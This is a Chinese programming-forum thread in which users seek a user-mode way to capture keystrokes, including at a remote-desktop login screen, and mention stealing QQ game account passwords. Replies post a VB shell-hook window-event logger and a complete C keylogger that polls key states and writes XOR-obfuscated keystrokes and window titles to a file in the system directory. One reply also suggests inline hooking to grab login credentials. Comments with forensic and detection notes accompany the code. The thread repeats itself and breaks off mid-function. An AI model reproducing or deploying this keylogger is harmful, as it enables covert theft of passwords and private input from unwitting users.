在远程桌面的那个桌面中运行你的程序安装钩子 这个不现实,远程桌面肯定是没有权限安装钩子的 raw input 当输入字符很快的时候就获取不到了还有你给的代码是ring0下的 我只要ring3下面的 不要使用驱动 xiaopoy的代码在远程登录界面是记录不到的
这段代码谁翻译成C啊 翻译了就结贴给分,谢谢了 Attribute VB_Name = "Module1" Option ExplicitPrivate Declare Function RegisterShellHook Lib "Shell32" Alias "#181" (ByVal hwnd As Long, ByVal nAction As Long) As Long 'use in 98 Private Declare Function RegisterShellHookWindow Lib "user32" (ByVal hwnd As Long) As Long 'use in NT5 Private Declare Function RegisterWindowMessage Lib "user32" Alias "RegisterWindowMessageA" (ByVal lpString As String) As Long Private Declare Function SetWindowLong Lib "user32" Alias "SetWindowLongA" (ByVal hwnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hwnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long Private Declare Function RegisterServiceProcess Lib "kernel32" (ByVal dwProcessID As Long, ByVal dwType As Long) As Long 'Powered by barenx 'Private Const HSHELL_WINDOWCREATED = 1 ' 系统级的窗体被创建 'Private Const HSHELL_WINDOWDESTROYED = 2 ' 系统级的窗体即将被关闭 'Private Const HSHELL_ACTIVATESHELLWINDOW = 3 ' SHELL 的主窗体将被激活(本例未用) 'Private Const HSHELL_WINDOWACTIVATED = 4 ' 系统级的窗体被激活 'Private Const HSHELL_GETMINRECT = 5 ' 窗体被最大化或最小化(本例未用) 'Private Const HSHELL_REDRAW = 6 ' Windows 任务栏被刷新(本例未用) 'Private Const HSHELL_TASKMAN = 7 ' 任务列表的内容被选中(本例未用) 'Private Const HSHELL_LANGUAGE = 8 ' 中英文切换或输入法切换(本例未用) 'MSDN 'wParam lParam 'HSHELL_GETMINRECT A pointer to a SHELLHOOKINFO structure. 'HSHELL_WINDOWACTIVATEED The HWND handle of the activated window. 'HSHELL_RUDEAPPACTIVATEED The HWND handle of the activated window. 'HSHELL_WINDOWREPLACING The HWND handle of the window replacing the top-level window. 'HSHELL_WINDOWREPLACED The HWND handle of the window being replaced. 'HSHELL_WINDOWCREATED The HWND handle of the window being created. 
'HSHELL_WINDOWDESTROYED The HWND handle of the top-level window being destroyed. 'HSHELL_ACTIVATESHELLWINDOW Not used. 'HSHELL_TASKMAN Can be ignored. 'HSHELL_REDRAW The HWND handle of the window that needs to be redrawn. 'HSHELL_FLASH The HWND handle of the window that needs to be flashed. 'HSHELL_ENDTASK The HWND handle of the window that should be forced to exit. 'HSHELL_APPCOMMAND The APPCOMMAND which has been unhandled by the application or other hooks. See WM_APPCOMMAND and use the message cracker GET_APPCOMMAND_LPARAM(lParam) to crack this parameter. Private Const HSHELL_WINDOWCREATED = 1 Private Const HSHELL_WINDOWDESTROYED = 2 Private Const HSHELL_ACTIVATESHELLWINDOW = 3 Private Const HSHELL_WINDOWACTIVATED = 4 Private Const HSHELL_GETMINRECT = 5 Private Const HSHELL_REDRAW = 6 Private Const HSHELL_TASKMAN = 7 Private Const HSHELL_LANGUAGE = 8 Private Const HSHELL_SYSMENU = 9 Private Const HSHELL_ENDTASK = 10 Private Const HSHELL_ACCESSIBILITYSTATE = 11 Private Const HSHELL_APPCOMMAND = 12 Private Const HSHELL_WINDOWREPLACED = 13 Private Const HSHELL_WINDOWREPLACING = 14 Private Const HSHELL_HIGHBIT = &H8000 Private Const HSHELL_FLASH = (HSHELL_REDRAW Or HSHELL_HIGHBIT) Private Const HSHELL_RUDEAPPACTIVATED = (HSHELL_WINDOWACTIVATED Or HSHELL_HIGHBIT) Private Const GWL_WNDPROC = -4 ' 该索引用来创建窗口类的子类 Private Shell_Hook_Msg_ID As Long Private LogWinOldProc As Long Private LogControl As Control Public Enum mLogControlType tListBox tTextBox tForm tPictureBox tLabel End Enum Private LogControlType As mLogControlType Public Function RegLogWindow(ByVal hwnd As Long, ByVal mLogControl As Control, ByVal tLogControlType As mLogControlType) As Boolean On Error Resume Next LogControlType = tLogControlType Dim tmp As Long Shell_Hook_Msg_ID = RegisterWindowMessage("SHELLHOOK") RegLogWindow = Shell_Hook_Msg_ID RegLogWindow = RegLogWindow And (RegisterShellHook(hwnd, 1) Or RegisterShellHookWindow(hwnd)) ' 调用未公开的函数(进行注册) LogWinOldProc = SetWindowLong(hwnd, GWL_WNDPROC, 
AddressOf WindowProc) ' 实施拦截:在存储了原入口地址的同时,将新地址指向自定义的函数WindowProc 'LogControl = mLogControl Set LogControl = mLogControl End FunctionPublic Function UnRegLogWindow(hwnd As Long) Call RegisterShellHook(hwnd, 0) Call SetWindowLong(hwnd, GWL_WNDPROC, LogWinOldProc) End FunctionPrivate Function WindowProc(ByVal hwnd As Long, ByVal uMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long ' 回调函数 Dim i As Long Dim m_Out_String As String Dim recTime As String Dim recParam As String If uMsg = Shell_Hook_Msg_ID Then recTime = Format$(Now(), "YY-MM-DD:HH-NN-SS ") & vbTab & " 0x" & _ Hex$(wParam) & vbTab & " 0x" & _ Hex$(lParam) & vbTab & " " Select Case wParam Case HSHELL_WINDOWCREATED m_Out_String = String$(260, vbNullChar) i = GetWindowText(lParam, m_Out_String, 260) ' 取窗体的标题 If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed" m_Out_String = recTime & "HSHELL_WINDOWCREATED" & vbTab & " " & m_Out_String Case HSHELL_WINDOWDESTROYED m_Out_String = String$(260, vbNullChar) i = GetWindowText(lParam, m_Out_String, 260) ' 取窗体的标题 If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed" m_Out_String = recTime & "HSHELL_WINDOWDESTROYED" & vbTab & " " & m_Out_String Case HSHELL_ACTIVATESHELLWINDOW m_Out_String = recTime & "HSHELL_ACTIVATESHELLWINDOW" Case HSHELL_WINDOWACTIVATED m_Out_String = String$(260, vbNullChar) i = GetWindowText(lParam, m_Out_String, 260) ' 取窗体的标题 If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed" m_Out_String = recTime & "HSHELL_WINDOWACTIVATEED" & vbTab & " " & m_Out_String Case HSHELL_GETMINRECT m_Out_String = recTime & "HSHELL_GETMINRECT" Case HSHELL_REDRAW m_Out_String = String$(260, vbNullChar) i = GetWindowText(lParam, m_Out_String, 260) ' 取窗体的标题 If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed" m_Out_String = recTime & "HSHELL_REDRAW" & vbTab & " " & m_Out_String Case HSHELL_TASKMAN m_Out_String = recTime & "HSHELL_TASKMAN" Case 
HSHELL_LANGUAGE m_Out_String = recTime & "HSHELL_LANGUAGE" Case HSHELL_SYSMENU m_Out_String = recTime & "HSHELL_SYSMENU" Case HSHELL_ENDTASK m_Out_String = String$(260, vbNullChar) i = GetWindowText(lParam, m_Out_String, 260) ' 取窗体的标题 If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed" m_Out_String = recTime & "HSHELL_ENDTASK" & vbTab & " " & m_Out_String Case HSHELL_ACCESSIBILITYSTATE m_Out_String = recTime & "HSHELL_ACCESSIBILITYSTATE" Case HSHELL_APPCOMMAND m_Out_String = recTime & "HSHELL_APPCOMMAND" Case HSHELL_WINDOWREPLACED m_Out_String = String$(260, vbNullChar) i = GetWindowText(lParam, m_Out_String, 260) ' 取窗体的标题 If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed" m_Out_String = recTime & "HSHELL_WINDOWREPLACED" & vbTab & " " & m_Out_String Case HSHELL_WINDOWREPLACING m_Out_String = String$(260, vbNullChar) i = GetWindowText(lParam, m_Out_String, 260) ' 取窗体的标题 If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed" m_Out_String = recTime & "HSHELL_WINDOWREPLACING" & vbTab & " " & m_Out_String Case HSHELL_FLASH m_Out_String = String$(260, vbNullChar) i = GetWindowText(lParam, m_Out_String, 260) ' 取窗体的标题 If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed" m_Out_String = recTime & "HSHELL_FLASH" & vbTab & " " & m_Out_String Case HSHELL_RUDEAPPACTIVATED m_Out_String = String$(260, vbNullChar) i = GetWindowText(lParam, m_Out_String, 260) ' 取窗体的标题 If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed" m_Out_String = recTime & "HSHELL_RUDEAPPACTIVATEED" & vbTab & " " & m_Out_String End Select If Len(m_Out_String) Then Call m_WriteToControl(m_Out_String) Else WindowProc = CallWindowProc(LogWinOldProc, hwnd, uMsg, wParam, lParam) End If End Function Private Function m_WriteToControl(t_str As String) Select Case LogControlType Case tListBox LogControl.AddItem t_str Case tTextBox LogControl.Text = LogControl.Text & vbCrLf & 
t_str Case tForm, tPictureBox LogControl.Print t_str Case tLabel LogControl.Caption = t_str End Select End Function
注册下输入设备 再在过程函数里面处理WM_INPUT消息就OK了 话说09年还是10年就看到有网友说QQ游戏的帐号、密码可以获取 没想到2011了还是没有改善
接收QQ登录框的输入消息时倒是有消息干扰 不过驱动级别还是能够获取
http://www.socool-soft.com/post/25.html
__beginthread ( KeyLogger);//
即可。
代码可以复制到编辑器里,然后就可以看好格式了。
// Appends one NUL-terminated ANSI string to the capture log after obfuscating it.
//
// Observable artefacts, useful for triage and forensics:
//   - The log is <system directory>\keylog.dat: the path comes from
//     GetSystemDirectory() with "\\keylog.dat" appended.
//   - Every byte is XORed with the constant 98 before it is written. This is
//     obfuscation, not encryption: XORing the file with 98 again restores the text.
//   - The file is opened and closed on every call, so a running instance produces
//     a steady stream of small writes to the same file.
//
// lpBuffer: text to record; its length is taken with lstrlen().
// No return value; none of the API results below are checked.
void SaveToFile(CHAR *lpBuffer)
{ CHAR strRecordFile[MAX_PATH];
GetSystemDirectory(strRecordFile, sizeof(strRecordFile));
lstrcat(strRecordFile, "\\keylog.dat");
// OPEN_ALWAYS: open the existing log or create it when it does not exist yet.
HANDLE hFile = CreateFile(strRecordFile, GENERIC_WRITE, FILE_SHARE_WRITE,
NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
DWORD dwBytesWrite = 0;
DWORD dwSize = GetFileSize(hFile, NULL);
// Below 500 MiB the write is appended at the end of the file. At or above that
// size the file pointer stays at offset 0, so the write lands at the start.
if (dwSize < 1024 * 1024 * 500)
SetFilePointer(hFile, 0, 0, FILE_END);
// "Encryption" in the author's words: a single-byte XOR with 98.
int nLength = lstrlen(lpBuffer);
LPBYTE lpEncodeBuffer = new BYTE[nLength];
for (int i = 0; i < nLength; i++)
lpEncodeBuffer[i] = lpBuffer[i] ^ 98;
WriteFile(hFile, lpEncodeBuffer, lstrlen(lpBuffer), &dwBytesWrite, NULL);
CloseHandle(hFile);
return ;
}
char *LowerCase[]={
"[BACKSPACE]",// "b",
"[Enter]",// "e",
"[ESC]",
"[F1]",
"[F2]",
"[F3]",
"[F4]",
"[F5]",
"[F6]",
"[F7]",
"[F8]",
"[F9]",
"[F10]",
"[F11]",
"[F12]",
"`",
"1",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9",
"0",
"-",
"=",
"[TAB]",
"q",
"w",
"e",
"r",
"t",
"y",
"u",
"i",
"o",
"p",
"[",
"]",
"a",
"s",
"d",
"f",
"g",
"h",
"j",
"k",
"l",
";",
"'",
"z",
"x",
"c",
"v",
"b",
"n",
"m",
",",
".",
"/",
"\\",
"[CTRL]",
"[WIN]",
" ",
"[WIN]",
// "[Print Screen]",
"[Scroll Lock]",
"[Insert]",
"[Home]",
// "[PageUp]",
"[Del]",
"[End]",
// "[PageDown]",
"[Left]",
"[UP]",
"[Right]",
"[Down]",
"[Num Lock]",
"/",
"*",
"-",
"+",
"0",
"1",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9",
".",};char *UpperCase[]={
"[BACKSPACE]",// "b",
"[Enter]",// "e",
"[ESC]",
"[F1]",
"[F2]",
"[F3]",
"[F4]",
"[F5]",
"[F6]",
"[F7]",
"[F8]",
"[F9]",
"[F10]",
"[F11]",
"[F12]",
"~",
"!",
"@",
"#",
"$",
"%",
"^",
"&",
"*",
"(",
")",
"_",
"+",
"[TAB]",
"Q",
"W",
"E",
"R",
"T",
"Y",
"U",
"I",
"O",
"P",
"{",
"}",
"A",
"S",
"D",
"F",
"G",
"H",
"J",
"K",
"L",
":",
"\"",
"Z",
"X",
"C",
"V",
"B",
"N",
"M",
"<",
">",
"?",
"│",
"[CTRL]",
"[WIN]",
" ",
"[WIN]",
// "[Print Screen]",
"[Scroll Lock]",
"[Insert]",
"[Home]",
// "[PageUp]",
"[Del]",
"[End]",
// "[PageDown]",
"[Left]",
"[Up]",
"[Right]",
"[Down]",
"[Num Lock]",
"/",
"*",
"-",
"+",
"0",
"1",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9",
".",};int SpecialKeys[]={
8,
13,
27,
112,
113,
114,
115,
116,
117,
118,
119,
120,
121,
122,
123,
192,
49,
50,
51,
52,
53,
54,
55,
56,
57,
48,
189,
187,
9,
81,
87,
69,
82,
84,
89,
85,
73,
79,
80,
219,
221,
65,
83,
68,
70,
71,
72,
74,
75,
76,
186,
222,
90,
88,
67,
86,
66,
78,
77,
188,
190,
191,
220,
17,
91,
32,
92,
// 44,
145,
45,
36,
// 33,
46,
35,
// 34,
37,
38,
39,
40,
144,
111,
106,
109,
107,
96,
97,
98,
99,
100,
101,
102,
103,
104,
105,
110,
};HWND PreviousFocus=NULL;
CHAR WindowCaption[1024]={0};
HWND hFocus = NULL;
// Reports whether the foreground window differs from the one seen on the previous
// call and, if it does and has a non-empty title, writes a header record through
// SaveToFile().
//
// Globals used: hFocus and WindowCaption are overwritten on every call;
// PreviousFocus remembers the last foreground window handle.
// Returns TRUE only when a header record was written, otherwise FALSE.
//
// Forensic note: the header holds the literal markers "[标题:]" (title) and
// "[时间:]" (time) followed by the window title and local time. SaveToFile() in
// this listing XORs every byte with 98, so these markers appear in the log only
// after decoding.
BOOL IsWindowsFocusChange()
{
// memset(hFocus,0,sizeof(hFocus));
memset(WindowCaption,0,sizeof(WindowCaption));
hFocus = GetForegroundWindow();
GetWindowText(hFocus,WindowCaption,sizeof(WindowCaption));
BOOL ReturnFlag = FALSE;
CHAR temp[1024]={0};
if (hFocus == PreviousFocus)
{ }
else
{
// A window with an empty title writes no header, but it still becomes PreviousFocus.
if (lstrlen(WindowCaption) > 0)
{
SYSTEMTIME s;
GetLocalTime(&s);
wsprintf(temp,"\r\n[标题:] %s\r\n[时间:]%d-%d-%d %d:%d:%d\r\n",WindowCaption,s.wYear,s.wMonth,s.wDay,s.wHour,s.wMinute,s.wSecond);
SaveToFile(temp);
memset(temp,0,sizeof(temp));
memset(WindowCaption,0,sizeof(WindowCaption));
ReturnFlag=TRUE;
}
PreviousFocus = hFocus;
}
return ReturnFlag;
}DWORD WINAPI KeyLogger(LPARAM lparam)
{
// Thread routine: polls the keyboard state in an endless loop and records each
// key when it is released. lparam is never read. The trailing "return 0" is
// unreachable because the while(TRUE) loop has no exit.
//
// Behaviour relevant to detection: no hook is installed and nothing is injected.
// The routine calls GetAsyncKeyState() for 92 virtual-key codes roughly every
// 8 ms and flushes through SaveToFile(). Monitoring that only watches hook
// registration will not see this; the high-frequency polling and the repeated
// small writes to the log file are the signals to look for.
//
// SpecialKeys[i] holds the virtual-key code; UpperCase[i] and LowerCase[i] hold
// the text recorded for the same index i.
int bKstate[256] = {0};
int i,x;
CHAR KeyBuffer[600];
int state;
int shift;
memset(KeyBuffer,0,sizeof(KeyBuffer));
while(TRUE)
{
Sleep(8);
// Flush whatever was collected on the previous pass. When the foreground window
// changed, IsWindowsFocusChange() has already written the header record and a
// "[内容:]" (content) marker is written before the buffered keys.
if (lstrlen(KeyBuffer) != 0)
{
if (IsWindowsFocusChange())
{
// lstrcat(KeyBuffer,"\r\n");
lstrcat(KeyBuffer,"\n");
SaveToFile("[内容:]");
SaveToFile(KeyBuffer);
memset(KeyBuffer,0,sizeof(KeyBuffer));
}
else
{ lstrcat(KeyBuffer,"\n");
SaveToFile(KeyBuffer);
memset(KeyBuffer,0,sizeof(KeyBuffer)); }
}
for(i=0;i<92;i++)
{
shift = GetKeyState(VK_SHIFT);
x = SpecialKeys[ i ];
// While the key is down, remember which modifier combination applied:
//   1 = Caps Lock state non-zero, Shift up,   code in 65..90 (letters)
//   2 = Caps Lock state non-zero, Shift down, code in 65..90 (letters)
//   3 = Shift down (any other case)
//   4 = everything else
if (GetAsyncKeyState(x) & 0x8000)
{
if (((GetKeyState(VK_CAPITAL) != 0) && (shift > -1) && (x > 64) && (x < 91))) //Caps Lock And Shift Is Not Pressed
{
bKstate[x] = 1;
}
else
if (((GetKeyState(VK_CAPITAL) != 0) && (shift < 0) && (x > 64) && (x < 91))) //Caps Lock And Shift Is Pressed
{
bKstate[x] = 2;
}
else
if (shift < 0)
{
bKstate[x] = 3;
}
else
bKstate[x] = 4;
}
else
{
// The key is up now; a non-zero saved state means it was down on an earlier
// pass, so this is the release and the key is recorded here.
if (bKstate[x] != 0)
{
state = bKstate[x];
bKstate[x] = 0;
if (x == 8)
{
/* KeyBuffer[lstrlen(KeyBuffer) - 1] = 0;
continue;*///record the Backspace key (as a marker instead of deleting the last character)
lstrcat(KeyBuffer,"[BACKSPACE]");
SaveToFile(KeyBuffer);
memset(KeyBuffer,0,sizeof(KeyBuffer));
continue;
}
else
// Flush before the 600-byte buffer fills. The key released on this pass is not
// appended in this branch.
if (lstrlen(KeyBuffer) > 550)
{
SaveToFile(KeyBuffer);
memset(KeyBuffer,0,sizeof(KeyBuffer));
continue;
}
else
if (x == 13)
{
/*if (lstrlen(KeyBuffer) == 0)
{
continue;
}*///if this check is not removed, Enter cannot be recorded
lstrcat(KeyBuffer,"<Enter>\r\n");
SaveToFile(KeyBuffer);
memset(KeyBuffer,0,sizeof(KeyBuffer));
continue;
}
else
{
// Odd states (1, 3) take the text from UpperCase, even states (2, 4) from LowerCase.
if ((state%2) == 1)
{
lstrcat(KeyBuffer,(CHAR *)UpperCase[ i ]);
}
else
if ((state%2) == 0)
{
lstrcat(KeyBuffer,(CHAR *)LowerCase[ i ]);
}
}
}
}
}
}
return 0;
}
http://blog.csdn.net/qq752923276/archive/2011/05/01/6382355.aspx
这个不现实,远程桌面肯定是没有权限安装钩子的
raw input 当输入字符很快的时候就获取不到了还有你给的代码是ring0下的 我只要ring3下面的 不要使用驱动
xiaopoy的代码在远程登录界面是记录不到的
Attribute VB_Name = "Module1"
Option ExplicitPrivate Declare Function RegisterShellHook Lib "Shell32" Alias "#181" (ByVal hwnd As Long, ByVal nAction As Long) As Long 'use in 98
Private Declare Function RegisterShellHookWindow Lib "user32" (ByVal hwnd As Long) As Long 'use in NT5
Private Declare Function RegisterWindowMessage Lib "user32" Alias "RegisterWindowMessageA" (ByVal lpString As String) As Long
Private Declare Function SetWindowLong Lib "user32" Alias "SetWindowLongA" (ByVal hwnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hwnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Private Declare Function RegisterServiceProcess Lib "kernel32" (ByVal dwProcessID As Long, ByVal dwType As Long) As Long
'Powered by barenx
'Private Const HSHELL_WINDOWCREATED = 1 ' 系统级的窗体被创建
'Private Const HSHELL_WINDOWDESTROYED = 2 ' 系统级的窗体即将被关闭
'Private Const HSHELL_ACTIVATESHELLWINDOW = 3 ' SHELL 的主窗体将被激活(本例未用)
'Private Const HSHELL_WINDOWACTIVATED = 4 ' 系统级的窗体被激活
'Private Const HSHELL_GETMINRECT = 5 ' 窗体被最大化或最小化(本例未用)
'Private Const HSHELL_REDRAW = 6 ' Windows 任务栏被刷新(本例未用)
'Private Const HSHELL_TASKMAN = 7 ' 任务列表的内容被选中(本例未用)
'Private Const HSHELL_LANGUAGE = 8 ' 中英文切换或输入法切换(本例未用)
'MSDN
'wParam lParam
'HSHELL_GETMINRECT A pointer to a SHELLHOOKINFO structure.
'HSHELL_WINDOWACTIVATEED The HWND handle of the activated window.
'HSHELL_RUDEAPPACTIVATEED The HWND handle of the activated window.
'HSHELL_WINDOWREPLACING The HWND handle of the window replacing the top-level window.
'HSHELL_WINDOWREPLACED The HWND handle of the window being replaced.
'HSHELL_WINDOWCREATED The HWND handle of the window being created.
'HSHELL_WINDOWDESTROYED The HWND handle of the top-level window being destroyed.
'HSHELL_ACTIVATESHELLWINDOW Not used.
'HSHELL_TASKMAN Can be ignored.
'HSHELL_REDRAW The HWND handle of the window that needs to be redrawn.
'HSHELL_FLASH The HWND handle of the window that needs to be flashed.
'HSHELL_ENDTASK The HWND handle of the window that should be forced to exit.
'HSHELL_APPCOMMAND The APPCOMMAND which has been unhandled by the application or other hooks. See WM_APPCOMMAND and use the message cracker GET_APPCOMMAND_LPARAM(lParam) to crack this parameter.
Private Const HSHELL_WINDOWCREATED = 1
Private Const HSHELL_WINDOWDESTROYED = 2
Private Const HSHELL_ACTIVATESHELLWINDOW = 3
Private Const HSHELL_WINDOWACTIVATED = 4
Private Const HSHELL_GETMINRECT = 5
Private Const HSHELL_REDRAW = 6
Private Const HSHELL_TASKMAN = 7
Private Const HSHELL_LANGUAGE = 8
Private Const HSHELL_SYSMENU = 9
Private Const HSHELL_ENDTASK = 10
Private Const HSHELL_ACCESSIBILITYSTATE = 11
Private Const HSHELL_APPCOMMAND = 12
Private Const HSHELL_WINDOWREPLACED = 13
Private Const HSHELL_WINDOWREPLACING = 14
Private Const HSHELL_HIGHBIT = &H8000
Private Const HSHELL_FLASH = (HSHELL_REDRAW Or HSHELL_HIGHBIT)
Private Const HSHELL_RUDEAPPACTIVATED = (HSHELL_WINDOWACTIVATED Or HSHELL_HIGHBIT)
Private Const GWL_WNDPROC = -4 ' 该索引用来创建窗口类的子类
Private Shell_Hook_Msg_ID As Long
Private LogWinOldProc As Long
Private LogControl As Control
Public Enum mLogControlType
tListBox
tTextBox
tForm
tPictureBox
tLabel
End Enum
Private LogControlType As mLogControlType
' Registers hwnd to receive shell hook notifications and subclasses it so that
' WindowProc sees them.
'   hwnd            - handle of the window that will receive the "SHELLHOOK" message
'   mLogControl     - control that receives the formatted log lines
'   tLogControlType - kind of control, used by m_WriteToControl to choose how to write
' Returns the registered message ID combined (bitwise And) with the result of the
' register calls, coerced to Boolean.
' NOTE(review): On Error Resume Next hides every failure in this function; presumably
' it is there because only one of the two register functions exists on a given
' Windows version (see the "use in 98" / "use in NT5" remarks on the declarations) - confirm.
Public Function RegLogWindow(ByVal hwnd As Long, ByVal mLogControl As Control, ByVal tLogControlType As mLogControlType) As Boolean
On Error Resume Next
LogControlType = tLogControlType
Dim tmp As Long
Shell_Hook_Msg_ID = RegisterWindowMessage("SHELLHOOK")
RegLogWindow = Shell_Hook_Msg_ID
RegLogWindow = RegLogWindow And (RegisterShellHook(hwnd, 1) Or RegisterShellHookWindow(hwnd)) ' call the undocumented function (to register)
LogWinOldProc = SetWindowLong(hwnd, GWL_WNDPROC, AddressOf WindowProc) ' install the intercept: keep the original entry address and point the window at the custom WindowProc
'LogControl = mLogControl
Set LogControl = mLogControl
' The next line ends RegLogWindow and starts UnRegLogWindow, which unregisters via
' RegisterShellHook(hwnd, 0) and restores the window procedure saved in LogWinOldProc.
End FunctionPublic Function UnRegLogWindow(hwnd As Long)
Call RegisterShellHook(hwnd, 0)
Call SetWindowLong(hwnd, GWL_WNDPROC, LogWinOldProc)
' The next line ends UnRegLogWindow and starts WindowProc, the replacement window
' procedure. For the shell hook message it formats one log line (timestamp, wParam and
' lParam in hex, event name and, for events whose lParam is a window handle, the window
' title) and passes it to m_WriteToControl. Every other message is forwarded to the
' original procedure. In the shell hook branch no return value is assigned.
End FunctionPrivate Function WindowProc(ByVal hwnd As Long, ByVal uMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long ' callback function
Dim i As Long
Dim m_Out_String As String
Dim recTime As String
Dim recParam As String
If uMsg = Shell_Hook_Msg_ID Then
recTime = Format$(Now(), "YY-MM-DD:HH-NN-SS ") & vbTab & " 0x" & _
Hex$(wParam) & vbTab & " 0x" & _
Hex$(lParam) & vbTab & " "
' wParam carries the HSHELL_* event code. The title lookup reads at most 260
' characters and falls back to "UnNamed" when GetWindowText returns 0.
Select Case wParam
Case HSHELL_WINDOWCREATED
m_Out_String = String$(260, vbNullChar)
i = GetWindowText(lParam, m_Out_String, 260) ' get the window title
If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed"
m_Out_String = recTime & "HSHELL_WINDOWCREATED" & vbTab & " " & m_Out_String
Case HSHELL_WINDOWDESTROYED
m_Out_String = String$(260, vbNullChar)
i = GetWindowText(lParam, m_Out_String, 260) ' get the window title
If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed"
m_Out_String = recTime & "HSHELL_WINDOWDESTROYED" & vbTab & " " & m_Out_String
Case HSHELL_ACTIVATESHELLWINDOW
m_Out_String = recTime & "HSHELL_ACTIVATESHELLWINDOW"
Case HSHELL_WINDOWACTIVATED
m_Out_String = String$(260, vbNullChar)
i = GetWindowText(lParam, m_Out_String, 260) ' get the window title
If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed"
m_Out_String = recTime & "HSHELL_WINDOWACTIVATEED" & vbTab & " " & m_Out_String
Case HSHELL_GETMINRECT
m_Out_String = recTime & "HSHELL_GETMINRECT"
Case HSHELL_REDRAW
m_Out_String = String$(260, vbNullChar)
i = GetWindowText(lParam, m_Out_String, 260) ' get the window title
If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed"
m_Out_String = recTime & "HSHELL_REDRAW" & vbTab & " " & m_Out_String
Case HSHELL_TASKMAN
m_Out_String = recTime & "HSHELL_TASKMAN"
Case HSHELL_LANGUAGE
m_Out_String = recTime & "HSHELL_LANGUAGE"
Case HSHELL_SYSMENU
m_Out_String = recTime & "HSHELL_SYSMENU"
Case HSHELL_ENDTASK
m_Out_String = String$(260, vbNullChar)
i = GetWindowText(lParam, m_Out_String, 260) ' get the window title
If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed"
m_Out_String = recTime & "HSHELL_ENDTASK" & vbTab & " " & m_Out_String
Case HSHELL_ACCESSIBILITYSTATE
m_Out_String = recTime & "HSHELL_ACCESSIBILITYSTATE"
Case HSHELL_APPCOMMAND
m_Out_String = recTime & "HSHELL_APPCOMMAND"
Case HSHELL_WINDOWREPLACED
m_Out_String = String$(260, vbNullChar)
i = GetWindowText(lParam, m_Out_String, 260) ' get the window title
If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed"
m_Out_String = recTime & "HSHELL_WINDOWREPLACED" & vbTab & " " & m_Out_String
Case HSHELL_WINDOWREPLACING
m_Out_String = String$(260, vbNullChar)
i = GetWindowText(lParam, m_Out_String, 260) ' get the window title
If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed"
m_Out_String = recTime & "HSHELL_WINDOWREPLACING" & vbTab & " " & m_Out_String
Case HSHELL_FLASH
m_Out_String = String$(260, vbNullChar)
i = GetWindowText(lParam, m_Out_String, 260) ' get the window title
If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed"
m_Out_String = recTime & "HSHELL_FLASH" & vbTab & " " & m_Out_String
Case HSHELL_RUDEAPPACTIVATED
m_Out_String = String$(260, vbNullChar)
i = GetWindowText(lParam, m_Out_String, 260) ' get the window title
If i > 0 Then m_Out_String = Left$(m_Out_String, i) Else m_Out_String = "UnNamed"
m_Out_String = recTime & "HSHELL_RUDEAPPACTIVATEED" & vbTab & " " & m_Out_String
End Select
' An event code that matches no Case leaves m_Out_String empty and writes nothing.
If Len(m_Out_String) Then Call m_WriteToControl(m_Out_String)
Else
WindowProc = CallWindowProc(LogWinOldProc, hwnd, uMsg, wParam, lParam)
End If
End Function
' Writes one log line to the control stored in LogControl, using the member that
' fits the control kind recorded in LogControlType:
'   tListBox            - adds the line as a new list item
'   tTextBox            - appends the line after a CR/LF
'   tForm, tPictureBox  - prints the line onto the surface
'   tLabel              - replaces the caption, so only the latest line is shown
' t_str: the already formatted log line. No value is returned.
Private Function m_WriteToControl(t_str As String)
Select Case LogControlType
Case tListBox
LogControl.AddItem t_str
Case tTextBox
LogControl.Text = LogControl.Text & vbCrLf & t_str
Case tForm, tPictureBox
LogControl.Print t_str
Case tLabel
LogControl.Caption = t_str
End Select
End Function
所以我不大确定LZ在回复前有测试一下,这个只是死循环来判断按键是否有按下以截取的,不需要注入之类的可能被拦截的流程,所以很方便。
但是想截取登陆时账号密码的话,你确定用键盘记录而不用inline hook来截取?你可以这样改来试一下:
SaveToFile改成void SaveToFile(CHAR *lpBuffer)
{
CHAR strRecordFile[MAX_PATH]= "c:\\";
lstrcatA(strRecordFile, "\\keylog.txt");
HANDLE hFile = CreateFileA(strRecordFile, GENERIC_WRITE, FILE_SHARE_WRITE,
NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
DWORD dwBytesWrite = 0;
